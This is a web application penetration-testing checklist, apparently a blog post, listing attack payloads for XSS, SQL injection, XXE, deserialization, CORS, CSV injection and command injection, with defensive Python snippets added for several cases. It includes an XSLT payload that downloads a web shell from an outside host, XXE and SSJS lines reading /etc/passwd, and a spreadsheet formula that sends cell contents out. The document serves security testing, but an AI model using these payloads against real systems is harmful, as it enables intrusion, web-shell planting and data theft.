Web app penetration testing checklist and cheatsheet (with examples)

It’s always handy to have a good checklist when it comes to web app pen-testing. It’s even better to have some examples for each case 🙂

We’ll start with more “general” cases and then dig deeper into some obscure or language dependent attacks.

Glossary

XSS (Cross-site scripting)

CSS(Cascading Style Sheet) injection

Format string attack

Directory traversal

SQL injection

SSJS (Server-side JavaScript) injection

XXE (Xml eXternal Entity)

XXE C# remote code execution

Deserialization

Expression Language Injection

Insecure direct object access

Open redirect

HTTP content splitting

CSRF (Cross-site request forgery)

CORS (Cross-origin resource sharing)

Check if tokens are removed at logout

Change HTTP Referer

Truncate file names

CSV injection

Code execution

Examples

XSS (Cross-site scripting)

<svg onload=alert(1)>
<svg/onload=alert(1)>
<img src=x123 onerror=confirm(1)>
onmousemove="prompt(1);"

CSS (Cascading Style Sheet) injection

When a CSS file is imported into the page, check whether the href lacks a leading “/” character: a path-relative stylesheet reference resolves against the path of the requested URL rather than a fixed location, so it can be made to load a different resource.

Here is an example:

<link href="styles.css" ...

More details here and here.

Format string attack

%d%d%d……%d
%n%n%n……%n
%lf%lf%lf……%lf
%s%s%s……%s
%x%x%x……%x

Directory traversal

../../.../etc/passwd
../../.../windows/system.ini

SQL injection

' or "1"='1
" or '1'="1
" OR SLEEP(5000) --
' OR SLEEP(5000) --
" OR WAITFOR DELAY '00:00:05' --
' OR WAITFOR DELAY '00:00:05' --
...

SSJS injection

res.end('malwrforensics')
res.end(require('fs').readFileSync('/etc/passwd'))

XXE (Xml eXternal Entity)

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds><user>&xxe;</user>
<pass>mypass</pass></creds>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://malwrforensics.com/scripts/hex_to_bin.txt" >]>
<foo>&xxe;</foo>
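A defender-side counterpart to the three payloads above, added here as an example (it is not code from the original post): refuse any untrusted XML that carries a DOCTYPE before anything is parsed, since the internal subset is the only place the SYSTEM entity can be declared. Standard library only; the two sample documents are constructed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

class DtdNotAllowed(ValueError):
    """Untrusted XML carried a DOCTYPE, the only place an ENTITY can be declared."""

def reject_dtd(data: bytes) -> None:
    """First pass: expat calls StartDoctypeDeclHandler at '<!DOCTYPE' itself,
    before any entity in the internal subset is declared, let alone resolved."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not allowed in untrusted input")

    parser.StartDoctypeDeclHandler = on_doctype
    # Also never fetch an external DTD subset or parameter entity during the scan.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(data, True)

def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Reject any DTD, then parse normally. ElementTree does not expand external
    entities on its own, but refusing the DTD also stops the SYSTEM lookups
    (file://, expect://, http://) shown in the payloads at the door."""
    reject_dtd(data)
    return ET.fromstring(data)

def classify(data: bytes) -> str:
    """Short verdict string so the behaviour is easy to assert on."""
    try:
        root = parse_untrusted_xml(data)
    except DtdNotAllowed:
        return "rejected: DTD present"
    except (ET.ParseError, xml.parsers.expat.ExpatError):
        return "rejected: malformed"
    return f"accepted: <{root.tag}>"

# Constructed samples: the file-read payload from this page and a harmless document.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""
BENIGN = b"<creds><user>alice</user><pass>mypass</pass></creds>"

if __name__ == "__main__":
    for doc in (XXE_PAYLOAD, BENIGN):
        print(classify(doc))
```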

XXE C# remote code execution

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://test.com/testnamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.aspx",
                       @"c:\inetpub\wwwroot\shell.aspx");

    return "It works!";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>

More details here.

Deserialization

Java

This is a great resource (and cheat sheet).

.NET:

AAEAAAD/////...

More details here and here.

Expression Language Injection

T(java.lang.Runtime).getRuntime().exec("calc.exe")

More details here.

Insecure direct object access

If an object is referenced by an ID, check if you can access other objects that aren’t exposed (objects you aren’t supposed to have access to).

Example: https://web.site/downloadfile?id=12345
Check other objects with different IDs (…, 12344, 12346, …).

Open redirect

This usually happens when one of the parameters in a form or request points to a URL.

Example: https://web.site/doCmd?id=1&url=http://web.site/page
You can change the url to point to another (phishing/malicious) website.

It can be used to bypass some content filtering systems, especially in conjunction with a URL shortening service.
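The mitigation for the case above, added as an example (not from the original post): validate the url parameter against the application's own host before redirecting, treating scheme-relative and userinfo tricks as off-site. The host name web.site and the sample values are assumptions taken from the example URL.

```python
from urllib.parse import urlsplit

def safe_redirect_target(url_param: str, site_host: str, default: str = "/") -> str:
    """Return url_param only when it can lead solely to site_host; else default.
    site_host is the hypothetical application host (e.g. "web.site")."""
    candidate = url_param.strip()
    # Control characters and backslashes: some browsers fold '\' into '/', and
    # CR/LF would turn the Location header into a header-injection vector.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in candidate) or "\\" in candidate:
        return default
    # '//host' and '///host' are scheme-relative in browsers even though
    # urlsplit treats the triple-slash form as a plain path.
    if candidate.startswith("//"):
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute URL: allow only http(s) and an exact host match. Using
        # .hostname strips userinfo, so 'https://web.site@evil.example' fails.
        if parts.scheme not in ("http", "https"):
            return default
        if (parts.hostname or "").lower() != site_host.lower():
            return default
        return candidate
    # Relative reference: require a single leading '/' so it stays on this origin.
    if not candidate.startswith("/"):
        return default
    return candidate

if __name__ == "__main__":
    for value in ("http://web.site/page", "/account", "//evil.example/",
                  "https://web.site@evil.example/", "javascript:alert(1)"):
        print(f"{value!r:40} -> {safe_redirect_target(value, 'web.site')!r}")
```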

HTTP content splitting

Inject CR/LF (\r\n) in the HTTP headers (for example if you control a cookie value).

More details here.

CSRF (Cross-site request forgery)

Check for the presence of tokens with random values in forms, especially forms that change a password or edit an address, an order, etc.

CORS (Cross-origin resource sharing)

Set the Origin HTTP request header to a website you control. This can be useful, for example, to steal CSRF tokens.

curl -i -H "Origin: http://malwrforensics.com" http://<yourwebsite>

Check whether the response contains
"Access-Control-Allow-Origin: http://malwrforensics.com" or
"Access-Control-Allow-Origin: *"

More details here.
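The same check as a reusable function, added here as an example (not from the original post): given the probe Origin and the response headers the curl above returns, report the misconfigurations that matter, including the credentials and Vary: Origin details the curl output alone does not flag. The response headers below are constructed.

```python
def cors_findings(probe_origin: str, headers: dict) -> list:
    """Judge the CORS response headers a server returned for a request that carried
    'Origin: <probe_origin>'. Header names are matched case-insensitively."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    vary = {v.strip().lower() for v in h.get("vary", "").split(",")}
    findings = []
    if acao is None:
        return findings  # no CORS grant at all: nothing is readable cross-origin
    if acao == "*":
        findings.append("wildcard ACAO: any origin can read unauthenticated responses")
        if creds:
            findings.append("wildcard combined with credentials=true: browsers refuse "
                            "the combination, but it shows the policy was never reviewed")
    elif acao == probe_origin:
        findings.append(f"ACAO reflects the probe origin {probe_origin}")
        if creds:
            findings.append("reflected origin with credentials=true: authenticated "
                            "responses (session data, CSRF tokens) are readable from that origin")
        if "origin" not in vary:
            findings.append("no 'Vary: Origin': a cache may serve this reflected grant to other origins")
    elif acao == "null":
        findings.append("ACAO 'null': sandboxed iframes and data: URLs match this origin")
    return findings

# Constructed response headers, as a server that reflects any Origin might send them.
REFLECTING = {
    "Content-Type": "text/html",
    "Access-Control-Allow-Origin": "http://malwrforensics.com",
    "Access-Control-Allow-Credentials": "true",
}
SAFE = {"Content-Type": "text/html"}

if __name__ == "__main__":
    for finding in cors_findings("http://malwrforensics.com", REFLECTING):
        print("-", finding)
```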

Check if tokens are removed at logout

Check whether the tokens and cookies are still valid after you log off. Use a proxy to capture the cookies/parameters, then iterate through them and check whether they are still accepted.

Change HTTP Referer

Use a proxy (Burp/ZAP/etc) to intercept and change the Referer field. Look for errors.

Truncate file names

Append %00 or %0D%0A to file names in GET/POST requests for files.

CSV injection

Add one of the following to a field that ends up in an exported CSV file.

"=1+1+cmd|' /C calc'!A0"
"=IMPORTXML("http://web.server?p="", "//a")"
"=IMPORTXML("http://web.server?p=", "//a/@href")"

=HYPERLINK("http://web.server?leak="&A1&A2,"Error: please click here")

This will show an error and, when the user clicks on it, the contents of the A1 and A2 fields will be exfiltrated.
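The export-side fix for these payloads, added here as an example (not from the original post): neutralise any text cell that starts with a formula trigger before writing the CSV, while leaving real numbers alone. The rows are constructed and reuse two payloads from this page.

```python
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets treat as a formula/DDE trigger.
FORMULA_LEADS = ("=", "+", "-", "@", "\t", "\r", "\n")

def neutralize_cell(value) -> str:
    """Prefix a text cell with an apostrophe when it would otherwise be parsed as a formula.
    Real numbers are left alone so a legitimate -5 does not become text."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value)
    return "'" + text if text.startswith(FORMULA_LEADS) else text

def export_rows(rows) -> str:
    """Write rows as CSV with every field quoted; QUOTE_ALL also doubles embedded quotes,
    so a payload cannot close the field early."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()

def read_back(text: str) -> list:
    """Parse CSV text back into rows (what a spreadsheet would see per cell)."""
    return list(csv.reader(io.StringIO(text)))

# Constructed export: user-supplied notes containing payloads from this page.
ROWS = [
    ["user", "amount", "note"],
    ["bob", -5, "=1+1+cmd|' /C calc'!A0"],
    ["eve", 12, '=HYPERLINK("http://web.server?leak="&A1&A2,"Error: please click here")'],
    ["ann", 3, "plain text stays as is"],
]

if __name__ == "__main__":
    print(export_rows(ROWS))
```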

Code execution

; cat /etc/passwd
& dir c: